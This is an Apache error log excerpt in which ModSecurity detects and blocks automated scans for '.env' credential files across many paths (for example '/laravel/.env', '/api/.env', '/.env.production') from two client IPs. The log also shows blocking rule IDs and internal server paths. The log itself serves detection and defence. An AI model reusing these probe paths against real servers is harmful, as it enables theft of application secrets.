[Fri Nov 28 01:41:39.055278 2025] [:error] [pid 372559] [client 52.53.201.43:41028] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aSjvw-loDCfZueN0CD7L1QAAAAY"]
[Fri Nov 28 01:41:39.055489 2025] [:error] [pid 372559] [client 52.53.201.43:41028] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aSjvw-loDCfZueN0CD7L1QAAAAY"]
[Fri Nov 28 01:41:39.399040 2025] [:error] [pid 372780] [client 52.53.201.43:41222] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/exapi/.env"] [unique_id "aSjvwzPUh6lCNYLkWq7b4wAAAAU"]
[Fri Nov 28 01:41:39.399275 2025] [:error] [pid 372780] [client 52.53.201.43:41222] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/exapi/.env"] [unique_id "aSjvwzPUh6lCNYLkWq7b4wAAAAU"]
[Fri Nov 28 01:41:39.399495 2025] [:error] [pid 372780] [client 52.53.201.43:41222] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/exapi/.env"] [unique_id "aSjvwzPUh6lCNYLkWq7b4wAAAAU"]
[Fri Nov 28 01:41:39.762007 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.env"] [unique_id "aSjvw7wQsF7h-v3vUEEusQAAAAI"]
[Fri Nov 28 01:41:39.762232 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.env"] [unique_id "aSjvw7wQsF7h-v3vUEEusQAAAAI"]
[Fri Nov 28 01:41:39.762469 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.env"] [unique_id "aSjvw7wQsF7h-v3vUEEusQAAAAI"]
[Fri Nov 28 01:41:40.106224 2025] [authz_core:error] [pid 372780] [client 52.53.201.43:41222] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Fri Nov 28 01:41:40.237505 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/sitemaps/.env"] [unique_id "aSjvxLwQsF7h-v3vUEEusgAAAAI"]
[Fri Nov 28 01:41:40.237721 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/sitemaps/.env"] [unique_id "aSjvxLwQsF7h-v3vUEEusgAAAAI"]
[Fri Nov 28 01:41:40.237908 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/sitemaps/.env"] [unique_id "aSjvxLwQsF7h-v3vUEEusgAAAAI"]
[Fri Nov 28 01:41:40.691436 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aSjvxLwQsF7h-v3vUEEuswAAAAI"]
[Fri Nov 28 01:41:40.691790 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aSjvxLwQsF7h-v3vUEEuswAAAAI"]
[Fri Nov 28 01:41:40.692077 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aSjvxLwQsF7h-v3vUEEuswAAAAI"]
[Fri Nov 28 01:41:40.692925 2025] [authz_core:error] [pid 372780] [client 52.53.201.43:41222] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env
[Fri Nov 28 01:41:41.196628 2025] [:error] [pid 372780] [client 52.53.201.43:41222] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aSjvxTPUh6lCNYLkWq7b5gAAAAU"]
[Fri Nov 28 01:41:41.196851 2025] [:error] [pid 372780] [client 52.53.201.43:41222] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aSjvxTPUh6lCNYLkWq7b5gAAAAU"]
[Fri Nov 28 01:41:41.197046 2025] [:error] [pid 372780] [client 52.53.201.43:41222] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aSjvxTPUh6lCNYLkWq7b5gAAAAU"]
[Fri Nov 28 01:41:41.811933 2025] [:error] [pid 372780] [client 52.53.201.43:41222] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aSjvxTPUh6lCNYLkWq7b5wAAAAU"]
[Fri Nov 28 01:41:41.812259 2025] [:error] [pid 372780] [client 52.53.201.43:41222] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aSjvxTPUh6lCNYLkWq7b5wAAAAU"]
[Fri Nov 28 01:41:41.812551 2025] [:error] [pid 372780] [client 52.53.201.43:41222] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aSjvxTPUh6lCNYLkWq7b5wAAAAU"]
[Fri Nov 28 01:41:42.008292 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aSjvxrwQsF7h-v3vUEEutQAAAAI"]
[Fri Nov 28 01:41:42.008500 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aSjvxrwQsF7h-v3vUEEutQAAAAI"]
[Fri Nov 28 01:41:42.008668 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aSjvxrwQsF7h-v3vUEEutQAAAAI"]
[Fri Nov 28 01:41:42.140959 2025] [:error] [pid 372780] [client 52.53.201.43:41222] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aSjvxjPUh6lCNYLkWq7b6AAAAAU"]
[Fri Nov 28 01:41:42.141180 2025] [:error] [pid 372780] [client 52.53.201.43:41222] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aSjvxjPUh6lCNYLkWq7b6AAAAAU"]
[Fri Nov 28 01:41:42.141387 2025] [:error] [pid 372780] [client 52.53.201.43:41222] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aSjvxjPUh6lCNYLkWq7b6AAAAAU"]
[Fri Nov 28 01:41:42.500801 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aSjvxrwQsF7h-v3vUEEutgAAAAI"]
[Fri Nov 28 01:41:42.501072 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aSjvxrwQsF7h-v3vUEEutgAAAAI"]
[Fri Nov 28 01:41:42.501280 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aSjvxrwQsF7h-v3vUEEutgAAAAI"]
[Fri Nov 28 01:41:42.904976 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/lab/.env"] [unique_id "aSjvxrwQsF7h-v3vUEEutwAAAAI"]
[Fri Nov 28 01:41:42.905196 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/lab/.env"] [unique_id "aSjvxrwQsF7h-v3vUEEutwAAAAI"]
[Fri Nov 28 01:41:42.905392 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/lab/.env"] [unique_id "aSjvxrwQsF7h-v3vUEEutwAAAAI"]
[Fri Nov 28 01:41:43.322225 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/psnlink/.env"] [unique_id "aSjvx7wQsF7h-v3vUEEuuAAAAAI"]
[Fri Nov 28 01:41:43.322464 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/psnlink/.env"] [unique_id "aSjvx7wQsF7h-v3vUEEuuAAAAAI"]
[Fri Nov 28 01:41:43.322658 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/psnlink/.env"] [unique_id "aSjvx7wQsF7h-v3vUEEuuAAAAAI"]
[Fri Nov 28 01:41:43.475471 2025] [:error] [pid 372780] [client 52.53.201.43:41222] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aSjvxzPUh6lCNYLkWq7b6gAAAAU"]
[Fri Nov 28 01:41:43.475686 2025] [:error] [pid 372780] [client 52.53.201.43:41222] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aSjvxzPUh6lCNYLkWq7b6gAAAAU"]
[Fri Nov 28 01:41:43.475869 2025] [:error] [pid 372780] [client 52.53.201.43:41222] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aSjvxzPUh6lCNYLkWq7b6gAAAAU"]
[Fri Nov 28 01:53:52.966055 2025] [:error] [pid 373935] [client 45.139.104.171:33174] [client 45.139.104.171] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSjyoJhu4YOudgJu20GKVAAAABY"]
[Fri Nov 28 01:53:52.966534 2025] [:error] [pid 373935] [client 45.139.104.171:33174] [client 45.139.104.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSjyoJhu4YOudgJu20GKVAAAABY"]
[Fri Nov 28 01:53:52.966723 2025] [:error] [pid 373935] [client 45.139.104.171:33174] [client 45.139.104.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSjyoJhu4YOudgJu20GKVAAAABY"]
